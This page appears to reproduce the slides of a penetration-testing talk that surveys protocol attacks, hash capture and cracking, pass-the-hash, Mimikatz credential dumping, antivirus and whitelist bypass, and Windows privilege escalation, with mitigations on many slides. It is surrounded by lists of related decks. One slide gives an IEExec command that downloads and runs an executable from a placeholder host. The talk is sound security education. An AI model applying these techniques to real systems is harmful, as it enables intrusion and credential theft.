TTL Alfresco Product Security and Best Practices 2017TTL Alfresco Product Security and Best Practices 2017
TTL Alfresco Product Security and Best Practices 2017Toni de la Fuente
 
BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopAjay Choudhary
 
SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)Jerome Smith
 
Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People SPC Adriatics
 
PLNOG 8: Merike Kaeo - Guide to Building Secure Infrastructures
PLNOG 8: Merike Kaeo - Guide to Building Secure InfrastructuresPLNOG 8: Merike Kaeo - Guide to Building Secure Infrastructures
PLNOG 8: Merike Kaeo - Guide to Building Secure InfrastructuresPROIDEA
 

Similar to Attack All The Layers - What's Working in Penetration Testing (20)

CNIT 123: 8: Desktop and Server OS Vulnerabilites
CNIT 123: 8: Desktop and Server OS VulnerabilitesCNIT 123: 8: Desktop and Server OS Vulnerabilites
CNIT 123: 8: Desktop and Server OS Vulnerabilites
 
Ch 8: Desktop and Server OS Vulnerabilites
Ch 8: Desktop and Server OS VulnerabilitesCh 8: Desktop and Server OS Vulnerabilites
Ch 8: Desktop and Server OS Vulnerabilites
 
SOHOpelessly Broken
SOHOpelessly BrokenSOHOpelessly Broken
SOHOpelessly Broken
 
CNIT 123 Ch 8: OS Vulnerabilities
CNIT 123 Ch 8: OS VulnerabilitiesCNIT 123 Ch 8: OS Vulnerabilities
CNIT 123 Ch 8: OS Vulnerabilities
 
CNIT 123 8: Desktop and Server OS Vulnerabilities
CNIT 123 8: Desktop and Server OS VulnerabilitiesCNIT 123 8: Desktop and Server OS Vulnerabilities
CNIT 123 8: Desktop and Server OS Vulnerabilities
 
640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths640-554 IT Certification and Career Paths
640-554 IT Certification and Career Paths
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain AccessDefcon 25 Packet Hacking Village - Finding Your Way to Domain Access
Defcon 25 Packet Hacking Village - Finding Your Way to Domain Access
 
Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018
 
QA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QAQA: Базовое тестирование защищенности веб-приложений в рамках QA
QA: Базовое тестирование защищенности веб-приложений в рамках QA
 
Database Firewall with Snort
Database Firewall with SnortDatabase Firewall with Snort
Database Firewall with Snort
 
Codefest2015
Codefest2015Codefest2015
Codefest2015
 
A Byte of Software Deployment
A Byte of Software DeploymentA Byte of Software Deployment
A Byte of Software Deployment
 
Application and Server Security
Application and Server SecurityApplication and Server Security
Application and Server Security
 
Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019
 
TTL Alfresco Product Security and Best Practices 2017
TTL Alfresco Product Security and Best Practices 2017TTL Alfresco Product Security and Best Practices 2017
TTL Alfresco Product Security and Best Practices 2017
 
BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming Workshop
 
SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)SSL Checklist for Pentesters (BSides MCR 2014)
SSL Checklist for Pentesters (BSides MCR 2014)
 
Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People Demystifying SharePoint Infrastructure – for NON-IT People
Demystifying SharePoint Infrastructure – for NON-IT People
 
PLNOG 8: Merike Kaeo - Guide to Building Secure Infrastructures
PLNOG 8: Merike Kaeo - Guide to Building Secure InfrastructuresPLNOG 8: Merike Kaeo - Guide to Building Secure Infrastructures
PLNOG 8: Merike Kaeo - Guide to Building Secure Infrastructures
 

Recently uploaded

A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024SynarionITSolutions
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 

Recently uploaded (20)

A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 

Attack All The Layers - What's Working in Penetration Testing

  • 1. Attack All the Layers: What’s Working During Pen Tests Scott Sutherland and Karl Fosaaen
  • 2. Introductions • Scott Sutherland ‒ Principal Security Consultant @ NetSPI ‒ Twitter: @_nullbind • Karl Fosaaen ‒ Senior Security Consultant @ NetSPI ‒ Twitter: @kfosaaen We specialize in both things and stuff!
  • 3. Overview • Why do Companies Pen Test? • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation • Conclusions
  • 4. Why do companies pen test? • Compliance requirements • Evaluate risks associated with an acquisition or partnership • Validate preventative controls • Validate detective controls • Prioritize internal security initiatives • Proactively prevent breaches
  • 5. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 6. Attacking protocols • ARP: Address Resolution Protocol • NBNS: NetBIOS Name Service • SMB: Server Message Block • PXE: Preboot Execution Environment • DTP: Dynamic Trunking Protocol
  • 8. Attacking protocols: ARP • General ‒MAC to IP association ‒Layer 2 • Conditions ‒Independent of user action ‒Broadcast network • Attacks ‒MITM Monitoring ‒MITM Injection ‒DOS
  • 10. Attacking protocols: ARP • Common mitigating controls: ‒ Dynamic ARP Inspection ‒ Port Security ‒ Static Routes (not recommended)
  • 11. Attacking protocols: NBNS / LLMNR NetBIOS Name Service
  • 12. Attacking protocols: NBNS • General ‒ IP to hostname association ‒ Layer 5 / 7 • Constraints ‒ Dependent on user action ‒ Broadcast Network ‒ Windows Only • Attacks ‒ MITM Monitoring ‒ MITM Injection ‒ DOS
  • 16. Attacking protocols: NBNS • Common mitigating controls: ‒ Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS ‒ Disable NBNS (recommended) • Might cause issues with legacy apps ‒ Disable insecure authentication to help • limit impact of exposed hashes ‒ Enable packet signing to help prevent • SMB Relay attacks
  • 18. Attacking protocols: SMB • General ‒ SMB is the come back kid! ‒ Layer 7 • Constraints ‒ Dependent on user action ‒ Any routable network ‒ No connecting back to originating host • Attacks ‒ Command execution ‒ Shells..aaand shells
  • 20. Attacking protocols: SMB • Historically, SMB Relay has been used to: ‒ Execute arbitrary commands ‒ Obtain shells • Lately the community has been developing tools for doing things like: ‒ LDAP queries ‒ SQL queries ‒ Exchange services ‒ Mounting file systems
  • 21. Attacking protocols: SMB • Common mitigating controls: ‒ Enable packet signing to help prevent SMB Relay attacks ‒ Apply really old patches like if you missed out on the last decade…
  • 23. Attacking protocols: PXE • General ‒ DHCP • Constraints ‒ Broadcast domain • Attacks ‒ Command execution ‒ Access to file system/images
  • 24. Attacking protocols: PXE • Common mitigating controls: ‒ Isolate networks ‒ Add device validation
  • 26. Attacking protocols: DTP • General ‒ 802.1Q encapsulation is in use ‒ Layer 2 • Constraints ‒ Independent of user action ‒ Trunking is set to enabled • or auto on switch port • Attacks ‒ Monitor network traffic for all VLANs, because all VLANs are • allowed on a trunk by default • *Full VLAN hopping
  • 31. Attacking protocols: DTP • Common mitigating controls: ‒ Use dedicated VLAN ID for all trunking ports ‒ Disable all unused ports and place them on a non-routable VLAN ‒ Configure all user ports as access ports to prevent trunk negotiation ‒ Configure frames with two 802.1Q headers ‒ Configure strong VACLs
  • 32. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 33. Attacking passwords • Hashes and Cracking (Offline) • Dictionary Attacks (Online) • Dump in Cleartext!
  • 34. Attacking Passwords Tool Function Year Pass the Hash Passing Hashes 1997 Rainbow Tables Password Cracking 2000s SMB Relay Relaying Captured Hashes 2001 John the Ripper Password Cracking 2001 NetNTLM.pl Cracking Network Hashes 2007 PTH Toolkit Pass all the Hashes 2008 Hashcat CPU and GPU Cracking 2010 WCE and Mimikatz Cleartext Windows Creds 2012
  • 35. Attacking Passwords: Hashes • What are hashes? ‒ A non-reversible way of storing passwords ‒ Operating systems and applications ‒ Lots of types • LM/NTLM • Network and Local • MD5 • SHA • descrypt
  • 36. Attacking Passwords: Hashes • How do we get hashes? ‒ Cain and Abel ‒ fgdump ‒ Metasploit ‒ Mimikatz ‒ Databases ‒ Config files
  • 37. Attacking Passwords: Cracking • Cracking Hashes ‒ Rainbow Tables ‒ John the Ripper ‒ oclHashcat ‒ CPU versus GPU
  • 40. Attacking Passwords: Passing Hashes • Passing Hashes ‒ Metasploit ‒ psexec ‒ winexec ‒ PTH toolkit
  • 41. Attacking Passwords: Dictionary • Online Vs. Offline Attacks • Dictionary Attacks ‒ Enumerate users • Null SMB logins, RPC, *SID BF, SNMP, LDAP, SharePoint, etc. ‒ Attack! • Are users getting smarter? ‒ Sort of… • “Summer2014” meets password • complexity requirements
  • 42. Attacking Passwords: Cleartext • Common application configs • Reversible Formats ‒ Find in files ‒ Groups.xml ‒ Unattend.xml ‒ Registry • WCE • Mimikatz
  • 43. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 44. Attacking Applications: Common • Default and weak passwords • SQL injection • RFI/web shells • Web directory traversals • UNC path injection + SMB relay • Critical missing patches
  • 45. Attacking Applications: Breakouts • Obtain a common dialog box • Bypass folder path and file type restrictions • Bypass file execution restrictions • Bypass file black/white lists • Access to native consoles and management tools • Downloading and use third party applications
  • 46. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 47. Bypassing EPP: Anti-virus • PowerShell code Injection • Execute off network share • Clone resource tables • Modify import tables • Pack files
  • 48. Bypassing EPP: App White List • Execution via approved apps ‒ Powershell Code Injection ‒ Rundll32 mydll,DLLMain@12 ‒ IEExec http://x.x.x.x:8080/bypass.exe • Exceptions ‒ File name ‒ Publisher ‒ Directory • Excessive privileges ‒ Services and policy
  • 49. Overview • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
  • 50. Windows Escalation: Overview • Privilege Escalation Goals • Local Privilege Escalation • Domain Privilege Escalation
  • 51. Windows Escalation: Goals • Local Escalation Goals ‒ Find clear text or reversible credentials with local administrative privileges ‒ Get application to run commands as Administrator or LocalSystem • Domain Escalation Goals ‒ Find Domain Admins ‒ Impersonate Domain Admins
  • 52. Windows Escalation: Local • Local Escalation ‒ *Clear text credentials in files, registry, over network ‒ Insecure service paths ‒ DLL preloading ‒ DLL and exe replacement ‒ Binary planting in auto-run locations (reg and file system) ‒ Modifying schedule tasks ‒ *Local and remote exploits ‒ Leverage local application like IIS, SQL Server etc ‒ *UNC path injection + SMB Relay / Capture + crack
  • 53. Windows Escalation: Domain • Domain Escalation – Find DAs ‒ Check locally! (Processes, Tokens, Cachedump) ‒ Review active sessions – netsess (veil) ‒ Review remote processes - tasklist ‒ Service Principal Names (SPN) – get-spn ‒ Scanning Remote Systems for NetBIOS Information - nbtscan ‒ Pass the hash to other systems ‒ PowerShell shell spraying ‒ WINRM/WINRS shell spraying ‒ Psexec shell spraying
  • 54. Windows Escalation: Domain • Domain Escalation – Impersonate DAs ‒ Dump passwords from memory with Mimikatz ‒ Migrate into the Domain Admin’s process ‒ Steal Domain Admins delegation tokens with Incognito ‒ Dump cached domain admin hashes with cachedump ‒ Relatively new techniques • PTH using Kerberos ticket
  • 55.
  • 56. Conclusions • Most Networks ‒ Kind of broken • Most Protocols ‒ Kind of broken • Most Applications ‒ Kind of broken All can kind of be fixed
  • 57. Attack all the layers! • Any questions?
  • 58. Attack all the layers! • Scott Sutherland ‒ Principal Security Consultant ‒ Twitter: @_nullbind • Karl Fosaaen ‒ Senior Security Consultant ‒ Twitter: @kfosaaen